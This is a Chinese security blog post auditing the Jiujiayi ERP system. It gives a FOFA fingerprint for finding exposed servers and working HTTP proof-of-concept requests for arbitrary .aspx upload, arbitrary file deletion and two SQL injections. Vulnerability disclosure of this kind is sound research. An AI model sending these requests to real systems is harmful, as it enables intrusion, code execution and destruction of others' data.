文章总结: 本文针对九佳易ERP系统进行了代码审计,发现其存在任意文件上传、任意文件删除及SQL注入等高危漏洞。文章详细分析了漏洞成因,包括文件后缀无过滤、路径拼接不当及参数直接拼接等问题,并提供了FOFA指纹语法与具体的漏洞复现POC。建议相关用户尽快进行安全排查,修复漏洞并加强输入验证,以防范潜在的安全风险。
综合评分: 90
文章分类: 代码审计,漏洞分析,漏洞POC,WEB安全
代码审计 | 九佳易ERP漏洞分析
原创
学安全的猪
学安全的猪
学安全的猪
2026年3月15日 18:31
江苏
概述
九佳易ERP存在文件上传、文件删除、SQL注入等漏洞。
fofa: body="/Scripts/Login_A8/"
任意文件上传
weshop/Comm/PicUploadIMG.ashx对应A8ERP.weshop.Comm.PicUploadIMG类,调用SaveIndexBgFile()方法上传文件,文件保存目录为网站目录+”weshoppics”+curTplb,curTplb通过传参控制,中间的SQL查询实现同curTplb文件夹下文件名从001开始递增,文件后缀从上传文件中获取无过滤,存在任意文件上传漏洞;
POST/weshop/Comm/PicUploadIMG.ashx?curTplb=001HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJ7jrM31JCYae3wBTContent-Length: 245
------WebKitFormBoundaryJ7jrM31JCYae3wBTContent-Disposition: form-data; name="Filedata"; filename="test.aspx"
<%@ Page Language="C#" %><%Response.Write(Guid.NewGuid().ToString());Response.End();%>------WebKitFormBoundaryJ7jrM31JCYae3wBT--
其他类似上传点,weshop/Comm/PicUploadHander.ashx、upload/UploadHanderForTaoZhuang.ashx;
文件删除
weshop/Comm/PicDelHandler.ashx对应A8ERP.weshop.Comm.PicDelHandler类,当参数q和参数n不为空时调用DelPic()方法删除n对应的文件,参数n以斜杠分割为三段再拼接成windows路径,n需要是xx/xx/xx格式的,删除前面上传的文件n=weshoppics/001/009.aspx、删除网站目录下的文件n=//xx.txt,存在文件删除漏洞;
GET /weshop/Comm/PicDelHandler.ashx?q=1&n=weshoppics/001/009.aspx HTTP/1.1Host: x.x.x.x
SQL注入
SQL注入1,HuiYuan/Hyxfmx.aspx对应A8ERP.HuiYuan.Hyxfmx类,curWxh参数直接拼接到SQL语句中执行,存在SQL注入漏洞;
GET /HuiYuan/Hyxfmx.aspx?curWxh=1')+and+1111+in+(select+sys.fn_sqlvarbasetostr(HashBytes('MD5','123')))--+ HTTP/1.1Host: x.x.x.x
SQL注入2,HuiYuan/HuiYuanDangAn/picHY.aspx对应A8ERP.HuiYuan.HuiYuanDangAn.picHY类,hyh参数字符串拼接,存在SQL注入漏洞;
GET /HuiYuan/HuiYuanDangAn/picHY.aspx?hyh=1'union+select+sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))--+ HTTP/1.1Host: x.x.x.x
免责声明:本文内容仅限于学习交流自查,旨在提高安全意识、加强安全防护。读者任何基于本文的操作均属个人行为,后果自负,与本文作者及本公众号无关。如有侵权请联系删除。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:学安全的猪 学安全的猪
学安全的猪《代码审计 | 九佳易ERP漏洞分析》